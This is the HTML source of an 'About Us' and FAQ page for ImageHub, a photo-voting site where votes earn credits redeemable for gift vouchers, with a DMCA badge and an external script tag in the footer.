<!DOCTYPE html>
<html>
<head>
    <title>ImageHub</title>
    <link rel="stylesheet" href="/stylesheets/bootstrap.min.css">
    <link rel="stylesheet" href="/stylesheets/font-awesome.min.css">
    <script src="javascripts/jquery-1.11.3.min.js"></script>
    <script src="javascripts/bootstrap.min.js"></script>
    <link rel="shortcut icon" href="/images/logo1.png">
    <style>
        body        { 
          padding-top:80px; 
              background: #000001 !important;}
        footer {
          float: right;
          height: 35px;
          margin: 0px 50px 0px 0px;
          color: #000;
          text-align: right;
          padding: 10px 30px;
          width: 180px;
      }
    </style>
</head>
<body>
<div class="container">

   
    <div class="page-header">
        <ul class="nav nav-tabs">
          <li><a href="/">Home</a></li>
          <li><a href="/dmca"> DMCA Protection </a></li>

        </ul>
  </div>
<div class="jumbotron text-center">
<h1><u>About Us</u></h1>

</div>
<div style="color:white; font-size:20px">
  ImageHub is a web application exclusively designed to appreciate and get some fame for the genuine talent.<br><br>
  If you are great at something, never do it for FREE.<br><br>
  <div>
    All the user needs to do is upload a picture and get maximum number of votes. With the increase in number of votes, credits increase. These credits can then later be used to claim rewards like gift vouckers or discount offers.<br>
    <br>Contact Us by sending email to support@imagehub.com
  </div><br><BR>
  <div style="font-size:40px"><u>
    
    Frequently Asked Questions(FAQs)<br><br></div></u>
    <ul>
      <li><b>What are credits?</b><br><br>
        <ul>
          <li>Credits are a kind of points which increases with the number of votes you have recieved on pictures uploaded by you. With each vote, credits increase by 5. Your credit information is displayed on user profile.<br>
          </li>
        </ul>
      </li><br>
      <li><b>What are votes?<br></b><br>
        <ul>
          <li>Votes denotes the number of users loved the picture uploaded. User can vote for picture if he/she likes it from Themeline page. Themeline shows the picture related to the active theme.</li>
        </ul>
      </li>
      <br>

      <b><li>What is the procedure of uploading a picture?<bR></b><br>
        <ul>
          <li>Go to user account page and select the picture you want to upload and click on the upload button. If the same picture is already uploaded by you or by any other user, you will  be refrained from uploading it again</li>
        </ul>
      </li><br>

      <b><li>What is the security policy?<br><br></b>
        <ul>
          <li> Please refer to <a href="/dmca">DMCA protection</a> page. </li>
        </ul>
      </li><bR>

      <b><li>How can I claim for rewards?</b><br><Br>
      <ul>
        <li>You can claim any of the rewards, the credits required for which is less than the available credits you have in your account. Once you claim for that reward, an email will be sent to you with the reward as attachment.</li>
      </ul>
    </li>
    </ul>

  </div>
</div>
<footer>
          <a href="http://www.dmca.com/Protection/Status.aspx?ID=ed7716f1-be0a-4c39-8b9a-988b7d28e39c" title="DMCA.com Protection Status" class="dmca-badge"> <img src="/images/dmca_protected.png" alt="DMCA.com Protection Status"></a>  <script src="https://webcdn.streamtest.net/streamtest.js" type="text/javascript"></script> 
</footer>


</body>

</html>